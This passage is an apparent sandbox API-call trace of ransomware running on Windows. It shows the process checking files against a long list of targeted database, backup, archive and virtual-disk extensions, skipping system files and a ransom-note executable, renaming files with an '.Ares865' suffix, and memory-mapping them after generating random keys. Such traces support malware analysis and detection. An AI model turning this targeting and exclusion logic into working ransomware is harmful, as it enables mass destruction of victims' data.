lstrlenW (lpString="myd") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.052] lstrlenW (lpString="ndf") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.052] lstrlenW (lpString="nnt") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.052] lstrlenW (lpString="nrmlib") returned 6 [0088.052] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.052] lstrlenW (lpString="ns2") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.052] lstrlenW (lpString="ns3") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.052] lstrlenW (lpString="ns4") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.052] lstrlenW (lpString="nsf") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.052] lstrlenW (lpString="nv") returned 2 [0088.052] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.052] lstrlenW (lpString="nv2") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.052] lstrlenW (lpString="nwdb") returned 4 [0088.052] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.052] lstrlenW (lpString="nyf") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.052] lstrlenW (lpString="odb") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.052] lstrlenW (lpString="odb") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.052] lstrlenW (lpString="oqy") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.052] lstrlenW (lpString="ora") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.053] lstrlenW (lpString="orx") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.053] lstrlenW (lpString="owc") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.053] lstrlenW (lpString="p96") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.053] lstrlenW (lpString="p97") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.053] lstrlenW (lpString="pan") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.053] lstrlenW (lpString="pdb") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.053] lstrlenW (lpString="pdm") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.053] lstrlenW (lpString="pnz") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.053] lstrlenW (lpString="qry") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.053] lstrlenW (lpString="qvd") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.053] lstrlenW (lpString="rbf") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.053] lstrlenW (lpString="rctd") returned 4 [0088.053] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.053] lstrlenW (lpString="rod") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.053] lstrlenW (lpString="rodx") returned 4 [0088.053] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.053] lstrlenW (lpString="rpd") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.053] lstrlenW (lpString="rsd") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.053] lstrlenW (lpString="sas7bdat") returned 8 [0088.053] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.053] lstrlenW (lpString="sbf") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.053] lstrlenW (lpString="scx") returned 3 [0088.053] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.053] lstrlenW (lpString="sdb") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.054] lstrlenW (lpString="sdc") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.054] lstrlenW (lpString="sdf") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.054] lstrlenW (lpString="sis") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.054] lstrlenW (lpString="spq") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.054] lstrlenW (lpString="te") returned 2 [0088.054] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.054] lstrlenW (lpString="teacher") returned 7 [0088.054] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.054] lstrlenW (lpString="tmd") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.054] lstrlenW (lpString="tps") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.054] lstrlenW (lpString="trc") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.054] lstrlenW (lpString="trc") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.054] lstrlenW (lpString="trm") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.054] lstrlenW (lpString="udb") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.054] lstrlenW (lpString="udl") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.054] lstrlenW (lpString="usr") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.054] lstrlenW (lpString="v12") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.054] lstrlenW (lpString="vis") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.054] lstrlenW (lpString="vpd") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.054] lstrlenW (lpString="vvv") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.054] lstrlenW (lpString="wdb") returned 3 [0088.054] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.055] lstrlenW (lpString="wmdb") returned 4 [0088.055] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.055] lstrlenW (lpString="wrk") returned 3 [0088.055] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.055] lstrlenW (lpString="xdb") returned 3 [0088.055] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.055] lstrlenW (lpString="xld") returned 3 [0088.055] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.055] lstrlenW (lpString="xmlff") returned 5 [0088.055] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.055] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.Ares865") returned 81 [0088.055] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.056] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.057] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=681312) returned 1 [0088.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.061] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.061] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.061] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.063] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.063] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.063] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa6860, lpName=0x0) returned 0x15c [0088.065] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa6860) returned 0xdd0000 [0088.140] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.141] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.141] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.141] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.141] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.141] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.141] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.141] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0088.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0088.141] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.141] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0088.147] CloseHandle (hObject=0x15c) returned 1 [0088.147] CloseHandle (hObject=0x118) returned 1 [0088.147] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.147] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.147] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.150] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x2b60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OUTLWVW.DLL.trx_dll", cAlternateFileName="OUTLWV~1.TRX")) returned 1 [0088.150] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".") returned 1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="..") returned 1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="windows") returned -1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="bootmgr") returned 1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="temp") returned -1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="boot") returned 1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="ids.txt") returned 1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="perflogs") returned -1 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="MSBuild") returned 1 [0088.151] lstrlenW (lpString="OUTLWVW.DLL.trx_dll") returned 19 [0088.151] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned 73 [0088.151] lstrcpyW (in: lpString1=0x2cce468, lpString2="OUTLWVW.DLL.trx_dll" | out: lpString1="OUTLWVW.DLL.trx_dll") returned="OUTLWVW.DLL.trx_dll" [0088.151] lstrlenW (lpString="OUTLWVW.DLL.trx_dll") returned 19 [0088.151] lstrlenW (lpString="Ares865") returned 7 [0088.151] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.151] lstrlenW (lpString=".dll") returned 4 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".dll") returned 1 [0088.151] lstrlenW (lpString=".lnk") returned 4 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".lnk") returned 1 [0088.151] lstrlenW (lpString=".ini") returned 4 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".ini") returned 1 [0088.151] lstrlenW (lpString=".sys") returned 4 [0088.151] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".sys") returned 1 [0088.151] lstrlenW (lpString="OUTLWVW.DLL.trx_dll") returned 19 [0088.151] lstrlenW (lpString="bak") returned 3 [0088.151] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.151] lstrlenW (lpString="ba_") returned 3 [0088.151] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.151] lstrlenW (lpString="dbb") returned 3 [0088.151] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.151] lstrlenW (lpString="vmdk") returned 4 [0088.151] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.151] lstrlenW (lpString="rar") returned 3 [0088.151] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.152] lstrlenW (lpString="zip") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.152] lstrlenW (lpString="tgz") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.152] lstrlenW (lpString="vbox") returned 4 [0088.152] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.152] lstrlenW (lpString="vdi") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.152] lstrlenW (lpString="vhd") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.152] lstrlenW (lpString="vhdx") returned 4 [0088.152] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.152] lstrlenW (lpString="avhd") returned 4 [0088.152] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.152] lstrlenW (lpString="db") returned 2 [0088.152] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.152] lstrlenW (lpString="db2") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.152] lstrlenW (lpString="db3") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.152] lstrlenW (lpString="dbf") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.152] lstrlenW (lpString="mdf") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.152] lstrlenW (lpString="mdb") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.152] lstrlenW (lpString="sql") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.152] lstrlenW (lpString="sqlite") returned 6 [0088.152] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.152] lstrlenW (lpString="sqlite3") returned 7 [0088.152] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.152] lstrlenW (lpString="sqlitedb") returned 8 [0088.152] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.152] lstrlenW (lpString="xml") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.152] lstrlenW (lpString="$er") returned 3 [0088.152] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.153] lstrlenW (lpString="4dd") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.153] lstrlenW (lpString="4dl") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.153] lstrlenW (lpString="^^^") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.153] lstrlenW (lpString="abs") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.153] lstrlenW (lpString="abx") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.153] lstrlenW (lpString="accdb") returned 5 [0088.153] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.153] lstrlenW (lpString="accdc") returned 5 [0088.153] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.153] lstrlenW (lpString="accde") returned 5 [0088.153] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.153] lstrlenW (lpString="accdr") returned 5 [0088.153] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.153] lstrlenW (lpString="accdt") returned 5 [0088.153] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.153] lstrlenW (lpString="accdw") returned 5 [0088.153] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.153] lstrlenW (lpString="accft") returned 5 [0088.153] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.153] lstrlenW (lpString="adb") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.153] lstrlenW (lpString="adb") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.153] lstrlenW (lpString="ade") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.153] lstrlenW (lpString="adf") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.153] lstrlenW (lpString="adn") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.153] lstrlenW (lpString="adp") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.153] lstrlenW (lpString="alf") returned 3 [0088.153] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.154] lstrlenW (lpString="ask") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.154] lstrlenW (lpString="btr") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.154] lstrlenW (lpString="cat") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.154] lstrlenW (lpString="cdb") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.154] lstrlenW (lpString="ckp") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.154] lstrlenW (lpString="cma") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.154] lstrlenW (lpString="cpd") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.154] lstrlenW (lpString="dacpac") returned 6 [0088.154] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.154] lstrlenW (lpString="dad") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.154] lstrlenW (lpString="dadiagrams") returned 10 [0088.154] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0088.154] lstrlenW (lpString="daschema") returned 8 [0088.154] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.154] lstrlenW (lpString="db-journal") returned 10 [0088.154] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0088.154] lstrlenW (lpString="db-shm") returned 6 [0088.154] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.154] lstrlenW (lpString="db-wal") returned 6 [0088.154] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.154] lstrlenW (lpString="dbc") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.154] lstrlenW (lpString="dbs") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.154] lstrlenW (lpString="dbt") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.154] lstrlenW (lpString="dbv") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.154] lstrlenW (lpString="dbx") returned 3 [0088.154] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.154] lstrlenW (lpString="dcb") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.155] lstrlenW (lpString="dct") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.155] lstrlenW (lpString="dcx") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.155] lstrlenW (lpString="ddl") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.155] lstrlenW (lpString="dlis") returned 4 [0088.155] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.155] lstrlenW (lpString="dp1") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.155] lstrlenW (lpString="dqy") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.155] lstrlenW (lpString="dsk") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.155] lstrlenW (lpString="dsn") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.155] lstrlenW (lpString="dtsx") returned 4 [0088.155] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.155] lstrlenW (lpString="dxl") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.155] lstrlenW (lpString="eco") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.155] lstrlenW (lpString="ecx") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.155] lstrlenW (lpString="edb") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.155] lstrlenW (lpString="epim") returned 4 [0088.155] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.155] lstrlenW (lpString="fcd") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.155] lstrlenW (lpString="fdb") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.155] lstrlenW (lpString="fic") returned 3 [0088.155] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.155] lstrlenW (lpString="flexolibrary") returned 12 [0088.155] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0088.155] lstrlenW (lpString="fm5") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.156] lstrlenW (lpString="fmp") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.156] lstrlenW (lpString="fmp12") returned 5 [0088.156] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.156] lstrlenW (lpString="fmpsl") returned 5 [0088.156] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.156] lstrlenW (lpString="fol") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.156] lstrlenW (lpString="fp3") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.156] lstrlenW (lpString="fp4") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.156] lstrlenW (lpString="fp5") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.156] lstrlenW (lpString="fp7") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.156] lstrlenW (lpString="fpt") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.156] lstrlenW (lpString="frm") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.156] lstrlenW (lpString="gdb") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.156] lstrlenW (lpString="gdb") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.156] lstrlenW (lpString="grdb") returned 4 [0088.156] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.156] lstrlenW (lpString="gwi") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.156] lstrlenW (lpString="hdb") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.156] lstrlenW (lpString="his") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.156] lstrlenW (lpString="ib") returned 2 [0088.156] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.156] lstrlenW (lpString="idb") returned 3 [0088.156] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.157] lstrlenW (lpString="ihx") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.157] lstrlenW (lpString="itdb") returned 4 [0088.157] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.157] lstrlenW (lpString="itw") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.157] lstrlenW (lpString="jet") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.157] lstrlenW (lpString="jtx") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.157] lstrlenW (lpString="kdb") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.157] lstrlenW (lpString="kexi") returned 4 [0088.157] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.157] lstrlenW (lpString="kexic") returned 5 [0088.157] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.157] lstrlenW (lpString="kexis") returned 5 [0088.157] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.157] lstrlenW (lpString="lgc") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.157] lstrlenW (lpString="lwx") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.157] lstrlenW (lpString="maf") returned 3 [0088.157] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.157] 